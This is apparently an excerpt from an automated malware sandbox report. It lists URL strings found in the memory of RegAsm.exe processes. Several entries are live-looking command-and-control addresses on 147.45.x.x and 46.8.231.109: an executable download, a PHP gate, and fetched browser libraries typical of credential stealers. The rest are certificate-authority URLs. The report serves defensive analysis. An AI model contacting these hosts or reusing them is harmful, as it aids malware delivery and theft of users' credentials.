Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66cf818156193_ldjfnsfd.exe
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66cf818156193_ldjfnsfd.exe-data;
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66cf818156193_ldjfnsfd.exe1kkkk1023589http://147.45.44.104/prog/66cf75d379
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66cf818156193_ldjfnsfd.exeY
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/4
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/8
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/F
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/R
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/Y
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/freebl3.dll
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/freebl3.dllxq
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/mozglue.dll
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/msvcp140.dll
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/msvcp140.dlllq
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/nss3.dll
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/nss3.dll&aQ~)
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/softokn3.dll
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/softokn3.dllPq
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/sql.dll
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/sql.dllna
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/sql.dllrrentVersion
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/vcruntime140.dll
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/~
Source: RegAsm.exe, 0000002E.00000002.2205091531.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2205091531.00000000004CE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2205091531.00000000005AF000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80
Source: RegAsm.exe, 0000002E.00000002.2205091531.00000000004B1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80IJ
Source: RegAsm.exe, 0000001D.00000002.1926386102.00000000004CE000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80JD
Source: RegAsm.exe, 0000002E.00000002.2205091531.00000000004B1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80JK
Source: RegAsm.exe, 0000002E.00000002.2205091531.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2205091531.00000000004CE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2205091531.00000000005AF000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80e
Source: RegAsm.exe, 0000002E.00000002.2205091531.000000000045A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80exe
Source: RegAsm.exe, 0000002E.00000002.2205091531.00000000004B1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2205091531.00000000004CE000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80fa20b20dvTLLjcqfGclHNCCYSAESCTrC.exe
Source: RegAsm.exe, 0000002E.00000002.2205091531.00000000004CE000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80ta
Source: RegAsm.exe, 00000003.00000002.1382432761.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/mozglue.dlli
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/nss3.dll(
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/nss3.dlls
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll#
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll-
Source: RegAsm.exe, 00000003.00000002.1382432761.0000000000470000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll_
Source: RegAsm.exe, 00000003.00000002.1384359989.000000000140A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll
Source: RegAsm.exe, 00000003.00000002.1382432761.0000000000470000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1411146244.00000000276DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php
Source: RegAsm.exe, 00000003.00000002.1384359989.000000000140A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php:#
Source: RegAsm.exe, 00000003.00000002.1384359989.000000000140A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpC
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpb
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpnu
Source: RegAsm.exe, 00000003.00000002.1382432761.00000000005AD000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpry=----IDHIIJJJKEGIDGCBAFIJdefaultrelease
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpw
Source: RegAsm.exe, 00000003.00000002.1382432761.00000000005AD000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109KFCFBFIDdata;
Source: userIEHDAFHDHC.exe, 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://64532127VdtSrezylanAPHTGetSystemInfoGetSystemTimeSleepkernel32.dllSymMatchStringInternetSetOp
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, HDAFIIDAKJ.exe.29.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, HDAFIIDAKJ.exe.29.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, HDAFIIDAKJ.exe.29.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, HDAFIIDAKJ.exe.29.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, DHCGHDHIDH.exe.29.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr	String found in binary or memory: http://ocsp.digicert.com0X
